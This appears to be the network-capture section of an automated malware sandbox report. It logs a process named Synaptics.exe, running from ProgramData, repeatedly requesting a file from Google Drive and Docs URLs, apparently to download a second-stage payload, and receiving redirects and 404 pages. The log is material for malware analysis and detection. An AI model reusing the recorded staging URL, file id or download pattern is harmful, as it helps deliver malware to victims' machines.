                                                                                                              2024-12-30 10:36:10 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                              2024-12-30 10:36:10 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 56 79 56 5f 4e 5a 39 71 4d 61 5a 37 49 68 66 4a 4e 34 41 73 68 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                              Data Ascii: t Found)!!1</title><style nonce="VyV_NZ9qMaZ7IhfJN4AshA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                              2024-12-30 10:36:10 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              56192.168.2.449818142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:10 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:10 UTC1250INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC5_NNTtI3YhGoiDZJTFh_92X5goal0xhS7kT4-KlQqluZOqdhLIa9-1xBKSI5bR2Up5yYeRo_U
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:10 GMT
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-323h0RAvFX0bKGa9nhr74g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:36:10 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                              2024-12-30 10:36:10 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 41 36 57 54 58 5f 6e 70 70 4b 6c 37 57 47 31 79 44 74 61 36 75 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="A6WTX_nppKl7WG1yDta6uQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                              2024-12-30 10:36:10 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              57192.168.2.449821142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:10 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              58192.168.2.449822142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:10 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              59192.168.2.449824142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:10 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              60192.168.2.449827142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:11 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:12 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:11 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-AY8UOf9hZGnyHFmWpnPN2A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              61192.168.2.449826142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:11 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:12 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:12 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-PI21KC414hHon-lweBmDxA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              62192.168.2.449830142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:12 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:13 UTC1243INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC4BwraRNqiugcSFNF06yOTy7hO2eUWRwqsyF0udZMujQCWuw-C_oZSGQp6QyE2ZKydM
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:13 GMT
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-52wsimOwzsfLXqV6pyq5mQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:36:13 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                              2024-12-30 10:36:13 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 41 36 6b 32 69 67 6a 6a 73 6e 51 5f 47 6d 6b 41 30 35 37 66 79 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                              Data Ascii: t Found)!!1</title><style nonce="A6k2igjjsnQ_GmkA057fyA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                              2024-12-30 10:36:13 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              63192.168.2.449829142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:12 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:13 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:12 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-8l85YUjlFG3nUy5RS07rug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              64192.168.2.449833142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:12 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:13 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:13 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-pQECPv_bvPZ8iQDLlZEa0Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              65192.168.2.449832142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:12 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:13 UTC1243INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC78Eg_lebVJmNqTSN2Hp2f97VQwEnQ1yWLx4yIIwGUyZJ90ztF7DZO_R1P-Eo6hh2G6
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:13 GMT
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
